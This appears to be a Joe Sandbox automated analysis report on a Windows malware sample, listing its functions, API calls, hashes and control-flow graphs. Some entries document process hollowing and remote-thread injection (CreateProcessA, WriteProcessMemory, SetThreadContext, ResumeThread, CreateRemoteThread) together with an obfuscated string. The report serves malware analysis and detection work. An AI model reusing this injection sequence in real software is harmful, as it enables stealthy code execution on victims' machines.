34680->34682 34681->34678 34681->34679 34684 3d55ca 34682->34684 34687 3d5547 34684->34687 34688 3d5575 34687->34688 34691 3d5571 34687->34691 34688->34691 34694 3d547c 34688->34694 34691->34681 34692 3d558f GetProcAddress 34692->34691 34693 3d559f std::_Locinfo::_Locinfo_dtor 34692->34693 34693->34691 34700 3d548d ___vcrt_InitializeCriticalSectionEx 34694->34700 34695 3d5523 34695->34691 34695->34692 34696 3d54ab LoadLibraryExW 34697 3d552a 34696->34697 34698 3d54c6 GetLastError 34696->34698 34697->34695 34699 3d553c FreeLibrary 34697->34699 34698->34700 34699->34695 34700->34695 34700->34696 34701 3d54f9 LoadLibraryExW 34700->34701 34701->34697 34701->34700 34702 3d653a 34714 3d3de5 34702->34714 34704 3d6553 34705 3d659f 34705->34704 34713 3d6601 34705->34713 34733 3d3e4e 43 API calls 2 library calls 34705->34733 34710 3d65f4 34710->34713 34734 3d696b 14 API calls 2 library calls 34710->34734 34721 3d672a 34713->34721 34715 3d3e06 34714->34715 34716 3d3df1 34714->34716 34715->34704 34715->34705 34732 3d68d0 45 API calls ___scrt_uninitialize_crt 34715->34732 34735 3cd503 14 API calls __dosmaperr 34716->34735 34718 3d3df6 34736 3cd405 43 API calls _Deallocate 34718->34736 34722 3d3de5 _Ungetc 43 API calls 34721->34722 34723 3d6739 34722->34723 34724 3d674c 34723->34724 34725 3d67df 34723->34725 34727 3d6769 34724->34727 34730 3d6790 34724->34730 34737 3d74a6 34725->34737 34728 3d74a6 ___scrt_uninitialize_crt 68 API calls 34727->34728 34729 3d6612 34728->34729 34730->34729 34748 3d7f83 47 API calls _Fputc 34730->34748 34732->34705 34733->34710 34734->34713 34735->34718 34738 3d74b2 ___scrt_is_nonwritable_in_current_image 34737->34738 34739 3d7576 34738->34739 34741 3d7507 34738->34741 34747 3d74ba 34738->34747 34779 3cd388 29 API calls 2 library calls 34739->34779 34749 3da3cb EnterCriticalSection 34741->34749 34743 3d750d 34744 3d752a 34743->34744 34750 3d75ae 34743->34750 34778 3d756e LeaveCriticalSection ___scrt_uninitialize_crt 34744->34778 34747->34729 34748->34729 34749->34743 34751 3d75d3 34750->34751 34777 3d75f6 ___scrt_uninitialize_crt 34750->34777 34752 3d75d7 34751->34752 34754 3d7635 34751->34754 34794 3cd388 29 API calls 2 library calls 34752->34794 34755 3d764c 34754->34755 34795 3d8021 45 API calls ___scrt_uninitialize_crt 34754->34795 34780 3d7132 34755->34780 34759 3d769c 34763 3d76ff WriteFile 34759->34763 34764 3d76b0 34759->34764 34760 3d765c 34761 3d7686 34760->34761 34762 3d7663 34760->34762 34797 3d6cf8 49 API calls 5 library calls 34761->34797 34762->34777 34796 3d70ca 6 API calls ___scrt_uninitialize_crt 34762->34796 34766 3d7721 GetLastError 34763->34766 34776 3d7697 34763->34776 34767 3d76ed 34764->34767 34768 3d76b8 34764->34768 34766->34776 34787 3d71b0 34767->34787 34771 3d76bd 34768->34771 34772 3d76db 34768->34772 34774 3d76c6 34771->34774 34771->34777 34799 3d7374 8 API calls 3 library calls 34772->34799 34798 3d728b 7 API calls 2 library calls 34774->34798 34776->34777 34777->34744 34778->34747 34779->34747 34800 3de6fb 34780->34800 34782 3d71a5 34782->34759 34782->34760 34783 3d7144 34783->34782 34784 3d7172 34783->34784 34809 3cc140 43 API calls _Fputc 34783->34809 34784->34782 34786 3d718c GetConsoleMode 34784->34786 34786->34782 34788 3d71bf ___scrt_uninitialize_crt 34787->34788 34791 3d722f WriteFile 34788->34791 34793 3d7270 34788->34793 34789 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34790 3d7289 34789->34790 34790->34777 34791->34788 34792 3d7272 GetLastError 34791->34792 34792->34793 34793->34789 34794->34777 34795->34755 34796->34777 34797->34776 34798->34777 34799->34776 34801 3de708 34800->34801 34802 3de715 34800->34802 34810 3cd503 14 API calls __dosmaperr 34801->34810 34804 3de721 34802->34804 34811 3cd503 14 API calls __dosmaperr 34802->34811 34804->34783 34806 3de70d 34806->34783 34807 3de742 34812 3cd405 43 API calls _Deallocate 34807->34812 34809->34784 34810->34806 34811->34807 34813 422248 34815 42224d 34813->34815 34816 422285 34815->34816 34817 422393 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 34816->34817 34822 422452 TerminateProcess 34816->34822 34817->34816 34818 422462 WriteProcessMemory 34817->34818 34819 4224a7 34818->34819 34820 4224e9 WriteProcessMemory Wow64SetThreadContext ResumeThread 34819->34820 34821 4224ac WriteProcessMemory 34819->34821 34821->34819 34822->34817

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 0042224D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 004223BC
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 004223CF
                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 004223ED
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00422411
                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0042243C
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE(?,00000000), ref: 0042245B
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00422494
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 004224DF
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0042251D
                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00422559
                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00422568
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                                                                  • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                                                                  • API String ID: 2440066154-977067982
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                                                  • Instruction ID: a9f00a95e15507f418fa3ad80161ee55d084730f23872a1ef2b99a5806e1f47f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82B1F67660024AAFDB60CF68CC80BDA73A5FF88714F158565EA0CAB341D774FA41CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DA24C Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: e38b66b3b163b1e1dda73f3095c298aa0b210bafec3ade253d4a852505a321a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ef2343b3272f61ddda4709411e4b84f91ebe4d722d81d0b17cdca244e411524
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38b66b3b163b1e1dda73f3095c298aa0b210bafec3ade253d4a852505a321a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE08C73911638EBCB16DB99EA0498AF3FCEB45B01B110497B501D3210C271DF00C7D0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D0947 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0bcbaf13c8628ce2ae70d5bcd0ecb212c4d9f7304e299a7df17b2671f4a21fa0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 795731407f79f6d2cfa23c59fd421f31f04a7c2db43056970606ef8ea834351b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bcbaf13c8628ce2ae70d5bcd0ecb212c4d9f7304e299a7df17b2671f4a21fa0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BC08C3600090047DE2F8924E3713AA3355E3A2F82FC0088EC84A4B753D72E9D82D601
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003E32DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C1D41: _strlen.LIBCMT ref: 003C1D59
                                                                                                                                                                                                                                                                                                  • VirtualProtectEx.KERNELBASE(000000FF,004220C0,000004AC,00000040,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 003E3338
                                                                                                                                                                                                                                                                                                  • FreeConsole.KERNELBASE ref: 003E333E
                                                                                                                                                                                                                                                                                                  • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,Function_00062248,003EEAC0,00000000,?), ref: 003E338C
                                                                                                                                                                                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000001), ref: 003E3399
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 003E33A0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 003E32F5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseConsoleCreateFreeHandleObjectProtectRemoteSingleThreadVirtualWait_strlen
                                                                                                                                                                                                                                                                                                  • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                                                                                                                                                                  • API String ID: 3638600928-32248209
                                                                                                                                                                                                                                                                                                  • Opcode ID: e7081c767b1bbd6c3814e23b863f30bbf5e28bfaa63b3a76b0a47180b8a9f6ea
                                                                                                                                                                                                                                                                                                  • Instruction ID: 630913f17522c61f36d8966b04c0b50ebc9c2e2cfeb501fdf2b8c5cc8f838579
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7081c767b1bbd6c3814e23b863f30bbf5e28bfaa63b3a76b0a47180b8a9f6ea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72216E726043607BD712AB319C49F9B7B98EF49720F100B2DF5669F1C1DA60AE06C7A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D547C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 37 3d547c-3d5488 38 3d551a-3d551d 37->38 39 3d548d-3d549e 38->39 40 3d5523 38->40 42 3d54ab-3d54c4 LoadLibraryExW 39->42 43 3d54a0-3d54a3 39->43 41 3d5525-3d5529 40->41 46 3d552a-3d553a 42->46 47 3d54c6-3d54cf GetLastError 42->47 44 3d54a9 43->44 45 3d5543-3d5545 43->45 49 3d5517 44->49 45->41 46->45 48 3d553c-3d553d FreeLibrary 46->48 50 3d5508-3d5515 47->50 51 3d54d1-3d54e3 call 3d2828 47->51 48->45 49->38 50->49 51->50 54 3d54e5-3d54f7 call 3d2828 51->54 54->50 57 3d54f9-3d5506 LoadLibraryExW 54->57 57->46 57->50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,AFD2407A,?,003D5589,003CB2B6,?,F8250000,00000000), ref: 003D553D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                                  • Opcode ID: fc53479b07c8c000ab02e99613fb1275197b3d4040a1b8001f64c19caa5921fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 02a42446a01f1d69e137b80c029c54d3b9fe0bcd418ce31d8626c6b8434fd7a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc53479b07c8c000ab02e99613fb1275197b3d4040a1b8001f64c19caa5921fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E121C633A01511BBCB339B25FC40A5A776EEF56761F160262E906AB3D0E670EF01C6D0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D83DF Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 58 3d83df-3d83f8 59 3d840e-3d8413 58->59 60 3d83fa-3d840a call 3cfbdd 58->60 62 3d8415-3d841f 59->62 63 3d8422-3d8448 call 3d89f6 59->63 60->59 67 3d840c 60->67 62->63 68 3d844e-3d8459 63->68 69 3d85bb-3d85cc call 3c5cbb 63->69 67->59 70 3d845f-3d8464 68->70 71 3d85ae 68->71 73 3d8479-3d8484 call 3d2e83 70->73 74 3d8466-3d846f call 3c6290 70->74 75 3d85b0 71->75 83 3d848f-3d8493 73->83 85 3d8486 73->85 74->83 84 3d8471-3d8477 74->84 79 3d85b2-3d85b9 call 3c5c9d 75->79 79->69 83->75 88 3d8499-3d84b0 call 3d89f6 83->88 87 3d848c 84->87 85->87 87->83 88->75 91 3d84b6-3d84c8 call 3d5916 88->91 93 3d84cd-3d84d1 91->93 94 3d84ec-3d84ee 93->94 95 3d84d3-3d84db 93->95 94->75 96 3d84dd-3d84e2 95->96 97 3d8515-3d8521 95->97 98 3d84e8-3d84ea 96->98 99 3d8594-3d8596 96->99 100 3d85a0 97->100 101 3d8523-3d8525 97->101 98->94 103 3d84f3-3d850d call 3d5916 98->103 99->79 102 3d85a2-3d85a9 call 3c5c9d 100->102 104 3d853a-3d8545 call 3d2e83 101->104 105 3d8527-3d8530 call 3c6290 101->105 102->94 103->99 116 3d8513 103->116 104->102 115 3d8547 104->115 105->102 114 3d8532-3d8538 105->114 117 3d854d-3d8552 114->117 115->117 116->94 117->102 118 3d8554-3d856c call 3d5916 117->118 118->102 121 3d856e-3d8575 118->121 122 3d8598-3d859e 121->122 123 3d8577-3d8578 121->123 124 3d8579-3d858b call 3d8a72 122->124 123->124 124->102 127 3d858d-3d8593 call 3c5c9d 124->127 127->99
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003D8466
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003D8527
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D858E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D2E83: HeapAlloc.KERNEL32(00000000,003D9981,?,?,003D9981,00000220,?,?,?), ref: 003D2EB5
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D85A3
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D85B3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 379a36b690d0b1889dab456849c09a4dbeb4e2c3f8d0eee2ade039be666b1aa0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70bccb902212f64acf9e7f9e91fe6fa46871469d590b9593b7895a2551b381ea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 379a36b690d0b1889dab456849c09a4dbeb4e2c3f8d0eee2ade039be666b1aa0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F51A073600216AFEB235F65EC81EBB76AEEF45350B16052AFD04DA351EB31ED5087A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D08D3 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,003D08CD,00000000,?,?,)=,AFD2407A,?,003D0A29), ref: 003D08E4
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,003D08CD,00000000,?,?,)=,AFD2407A,?,003D0A29), ref: 003D08EB
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 003D08FD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 62c6d710690bf01f08de54a3d3cce489fc2089d10efeb5f62f87666753593cc6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 21627f20116cd9e2be8121d84c868e0410bea1f4e9ea1ac8804f47f5720f2800
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62c6d710690bf01f08de54a3d3cce489fc2089d10efeb5f62f87666753593cc6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D01732000148AFCF262FA0FC49A4D7F2EEF04751F004021BA084E172CB758D419A80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D75AE Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
